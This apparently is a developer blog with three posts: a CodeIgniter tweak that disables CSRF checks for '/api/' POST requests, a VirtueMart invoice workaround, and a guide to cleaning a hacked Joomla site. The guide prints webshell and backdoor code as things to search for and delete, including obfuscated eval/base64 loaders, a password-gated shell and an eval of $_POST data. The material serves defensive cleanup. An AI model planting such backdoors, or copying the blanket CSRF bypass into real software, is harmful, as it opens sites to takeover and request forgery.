Wednesday 11 June 2014

POST request using REST API on CodeIgniter return Page Error 500

If you are trying to execute a POST request using REST API on CodeIgniter, and stoked with Page Error 500, or Request Page Not Found error,
An Error Was Encountered
The action you have requested is not allowed.
Then, please check for CSRF Protection check on application/config/config.php file > Line No below. 340 If you are already using the CSRF Security or already enabled, then add the following code just below 'csrf_expire' line.
/** Start of CSRF Skip for APIs Request
 *
 * If the REQUEST_URI has method is POST and requesting the API url,
 * then skip CSRF check, otherwise don't do.
 */
if (isset($_SERVER["REQUEST_URI"]) &&
   (isset($_SERVER['REQUEST_METHOD']) && ($_SERVER['REQUEST_METHOD'] == 'POST') ))
{
    if ( stripos($_SERVER["REQUEST_URI"], '/api/') === false )  
    {
        // If POST request is not for api request, Apply CSRF True
        $config['csrf_protection'] = TRUE;
    }
    else {
        // If POST request is for API, Skip CSRF Check
        $config['csrf_protection'] = FALSE;
    }
}
/** End of CSRF Skip for APIs Request */

Tuesday 10 June 2014

Blank page during Order Status Updates on Joomla VirtueMart

If you are trying the update the orders' status on Joomla VirtueMart, and you are left with blank page while updating, in that case there is problem with PDF Invoice generation, so for quick redirection to avoid blank page, do following modification.

But, mind you it will not generate any PDF Invoices (its just a quick fix to redirect back after updates). However, I will come back later with solution for PDF Invoice generation.

Go to joomla project root/components/com_virtuemart/controllers/invoice.php > Line no 279
Then comment the line and add the code as below;
279   //return VmPdf::createVmPdf($view, $path, 'F', $metadata);
280   return true;

Thursday 5 June 2014

To recover a hacked Joomla Website attacked by Malware

If you are using Joomla (particularly on Joomla 2.5.20 or lower)  and you website has been hacked and it sending lots of spam emails from your server, then there might be some hidden code left on your webserver by Malware.

Please find the list of thing which need checking as below;

 1. Check a .htaccess file (if you got any) for something unusual script exist like below;
< IfModule mod_rewrite.c >
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC] 
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/sitename/public_html//common.php -f
RewriteRule ^.*$    /common.php [L]
< / IfModule >
Just remove the above script or if can also replace a .htaccess file with standard joomla .htaccess file.

2. Find any common.php file on the root folder and if you are not sure about it. You can also check whether you see something like below on that file. Please, just delete it.

$PXyCcfGZONUJafapZKpDwrnNv='ba'.'se64_d'.'ecod'.'e';
eval($PXyCcfGZONUJafapZKpDwrnNv("cHJlZ19yZXBsYWNlKCIvQ1JOVjNDQzhOSFNiQ3JWdHNEQkZtRGJlaS9lIiwgIkp3PWVScG1CdHNIM........."));


3. Search for any ajax.php file on any folder and if found it, please check whether you see something like below on that file. If found, please just delete it.

$x74="+HM)?Z\"Yb&eny`{BPX^(=3}DT@q-m#9;UwI_[]8p/a~sE4zvW:%7*AdF0\r GruLfh>1cl!Vgt<.RQKJx6i\t5o|\\CN\$O\n,'2Skj"; 
$GLOBALS['utxje85'] = $x74[10].$x74[60].$x74[60].$x74[84].$x74[60].$x74[35].$x74[60].$x74[10]
.......
.......;

4. Similarly, search for any smile.php file on any folder and if found it, please check whether you see something like below on that file. If found, please just delete it.

eval(gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIo...........
.......
.......)));

5. Futher, search for any file having below script (particularly update.php file) on any folder and if found it. If found, please just delete those script and make sure you have the right script on those files.

if(!empty($_GET['action']) && $_GET['action'] == 'set_password' && !empty($_GET['hashed_password'])) {

    $hashed_password = $_GET['hashed_password'];
    
    $fh = fopen(PASSWORD_FILE, "w");
    
    if($fh==false) die("unable to create file");
    
    fputs ($fh, $hashed_password);
    
    fclose ($fh);
    
    exit;
}

if(!file_exists(PASSWORD_FILE)) {

    $hashed_password = 'a6a8cb877ee18215f2c0fc2a6c7b4f2a';
    
    $fh = fopen(PASSWORD_FILE, "w");
    
    if($fh==false) die("unable to create file");
    
    fputs ($fh, $hashed_password);
    
    fclose ($fh);

}
else {
    $hashed_password = trim(file_get_contents(PASSWORD_FILE));
}

define('SHELL_PASSWORD', $hashed_password);
define('MAX_UP_LEVELS', 10);

if(empty($_COOKIE['password']) && empty($_POST['password']) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
    print '< form method="post" >
Password : < input name="password" type="text" / >  < input type="submit" / >< / form >
';
}

if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {

    setcookie('password', SHELL_PASSWORD, time() + 60*60*24);
    
    header("Location: {$_SERVER['PHP_SELF']}");
    
    exit;
}

if(empty($_COOKIE) || $_COOKIE['password'] != SHELL_PASSWORD) {
    exit;
}

// Actual Joomla Code Start from here....
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);
....
....

6. Moreover, search for p.txt file and if you found it, and if it contains only encrypted string, please delete that file as well;
// sample encrypted code
a6a8cb877ee18215f2c0fc2a6c7b4f2a

7. Also, search for eval(base64_decode($_POST[' script across all files and if you found any, that was put by malware, so delete that line of code across all those found files. Normally, the below code is added at the very top or very bottom of the files;
eval(base64_decode($_POST['n26712b']));

8. Lastly, search for all error_log files across all the folder and delete all if you reckon, they should not be there.

Also, it's quite painful and time consuming to go through all above steps, but just search for any of above scripts which are similar or have similar patterns and trash all. Just beware that targeted file names may be different sometimes.

If you have got anything different then mentioned above, and you got any solution, please comment on this article so that it would be helpful to others